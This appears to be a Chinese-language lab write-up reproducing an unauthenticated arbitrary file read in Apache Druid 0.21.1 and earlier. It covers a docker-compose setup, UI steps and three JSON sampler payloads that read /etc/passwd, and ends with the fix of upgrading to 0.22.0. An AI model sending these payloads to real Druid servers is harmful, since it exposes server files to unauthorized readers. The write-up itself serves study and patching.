本文字数:1667
阅读时长:5~6min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负
0x01 简介
Apache Druid 是一个集时间序列数据库、数据仓库和全文检索系统特点于一体的分析性数据平台。
0x02 漏洞概述
Apache Druid对用户指定的HTTP InputSource没有做限制,并且Apache Druid默认管理页面是不需要认证即可访问的。因此未经授权的远程攻击者可以通过构造恶意参数读取服务器上的任意文件。
0x03 影响版本
Apache Druid <= 0.21.1
0x04 环境搭建
创建docker-compose.yml,内容如下:
docker-compose.yml
version: "2.2"
volumes:
metadata_data: {}
middle_var: {}
historical_var: {}
broker_var: {}
coordinator_var: {}
router_var: {}
services:
postgres:
container_name: postgres
image: postgres:latest
volumes:
- metadata_data:/var/lib/postgresql/data
environment:
- POSTGRES_PASSWORD=FoolishPassword
- POSTGRES_USER=druid
- POSTGRES_DB=druid
# Need 3.5 or later for container nodes
zookeeper:
container_name: zookeeper
image: zookeeper:3.5
environment:
- ZOO_MY_ID=1
coordinator:
image: apache/druid:0.21.1
container_name: coordinator
volumes:
- ./storage:/opt/data
- coordinator_var:/opt/druid/var
depends_on:
- zookeeper
- postgres
ports:
- "8081:8081"
command:
- coordinator
env_file:
- environment
broker:
image: apache/druid:0.21.1
container_name: broker
volumes:
- broker_var:/opt/druid/var
depends_on:
- zookeeper
- postgres
- coordinator
ports:
- "8082:8082"
command:
- broker
env_file:
- environment
historical:
image: apache/druid:0.21.1
container_name: historical
volumes:
- ./storage:/opt/data
- historical_var:/opt/druid/var
depends_on:
- zookeeper
- postgres
- coordinator
ports:
- "8083:8083"
command:
- historical
env_file:
- environment
middlemanager:
image: apache/druid:0.21.1
container_name: middlemanager
volumes:
- ./storage:/opt/data
- middle_var:/opt/druid/var
depends_on:
- zookeeper
- postgres
- coordinator
ports:
- "8091:8091"
command:
- middleManager
env_file:
- environment
router:
image: apache/druid:0.21.1
container_name: router
volumes:
- router_var:/opt/druid/var
depends_on:
- zookeeper
- postgres
- coordinator
ports:
- "8888:8888"
command:
- router
再在同级目录下创建名为environment
的文件,内容如下 environment
# Java tuning
DRUID_XMX=1g
DRUID_XMS=1g
DRUID_MAXNEWSIZE=250m
DRUID_NEWSIZE=250m
DRUID_MAXDIRECTMEMORYSIZE=6172m
druid_emitter_logging_logLevel=debug
druid_extensions_loadList=["druid-histogram", "druid-datasketches", "druid-lookups-cached-global", "postgresql-metadata-storage"]
druid_zk_service_host=zookeeper
druid_metadata_storage_host=
druid.javascript.enabled = true
druid_metadata_storage_type=postgresql
druid_metadata_storage_connector_connectURI=jdbc:postgresql://postgres:5432/druid
druid_metadata_storage_connector_user=druid
druid_metadata_storage_connector_password=FoolishPassword
druid_coordinator_balancer_strategy=cachingCost
druid_indexer_runner_javaOptsArray=["-server", "-Xmx1g", "-Xms1g", "-XX:MaxDirectMemorySize=4g", "-Duser.timezone=UTC", "-Dfile.encoding=UTF-8", "-Djava.util.logging.manager=org.apache.logging.log4j.jul.LogManager"]
druid_indexer_fork_property_druid_processing_buffer_sizeBytes=268435456
druid_storage_type=local
druid_storage_storageDirectory=/opt/data/segments
druid_indexer_logs_type=file
druid_indexer_logs_directory=/opt/data/indexing-logs
druid_processing_numThreads=2
druid_processing_numMergeBuffers=2
DRUID_LOG4J=<?xml version="1.0" encoding="UTF-8" ?><Configuration status="WARN"><Appenders><Console name="Console" target="SYSTEM_OUT"><PatternLayout pattern="%d{ISO8601} %p [%t] %c - %m%n"/></Console></Appenders><Loggers><Root level="info"><AppenderRef ref="Console"/></Root><Logger name="org.apache.druid.jetty.RequestLog" additivity="false" level="DEBUG"><AppenderRef ref="Console"/></Logger></Loggers></Configuration>
执行docker-compose up -d后,访问8081端口即可
0x05 漏洞复现
点击load data。选择http(s):// ,点击connect data
URIs填写file:///etc/passwd,然后点击load按钮,页面直接回显
向接口/druid/indexer/v1/sampler以POST请求的方式发送以下数据。
{
"type": "index",
"spec": {
"ioConfig": {
"type": "index",
"inputSource": {
"type": "local",
"baseDir": "/etc/",
"filter": "passwd"
},
"inputFormat": {
"type": "json",
"keepNullColumns": true
}
},
"dataSchema": {
"dataSource": "sample",
"timestampSpec": {
"column": "timestamp",
"format": "iso",
"missingValue": "1970"
},
"dimensionsSpec": {}
}
},
"type": "index",
"tuningConfig": {
"type": "index"
}
},
"samplerConfig": {
"numRows": 500,
"timeoutMs": 15000
}
}
或者(firehose 老版本使用 大概0.15.0左右)
{
"type": "index",
"spec": {
"ioConfig": {
"type": "index",
"firehose": {
"type": "local",
"baseDir": "/etc/",
"filter": "passwd"
}
},
"dataSchema": {
"dataSource": "sample",
"parser": {
"parseSpec": {
"format": "json",
"timestampSpec": {},
"dimensionsSpec": {}
}
}
}
},
"samplerConfig": {
"numRows": 500,
"timeoutMs": 15000
}
}
或者(网传payload)
{
"type": "index",
"spec": {
"type": "index",
"ioConfig": {
"type": "index",
"firehose": {
"type": "http",
"uris": ["file:///etc/passwd"]
}
},
"dataSchema": {
"dataSource": "sample",
"parser": {
"type": "string",
"parseSpec": {
"format": "regex",
"pattern": "(.*)",
"columns": ["a"],
"dimensionsSpec": {},
"timestampSpec": {
"column": "!!!_no_such_column_!!!",
"missingValue": "2010-01-01T00:00:00Z"
}
}
}
}
},
"samplerConfig": {
"numRows": 500,
"timeoutMs": 15000
}
}
0x06 修复方式
升级至Apache Druid 0.22.0及以上版本
https://github.com/apache/druid/
参考链接:
https://www.freebuf.com/vuls/263276.html https://druid.apache.org/docs/latest/tutorials/docker.html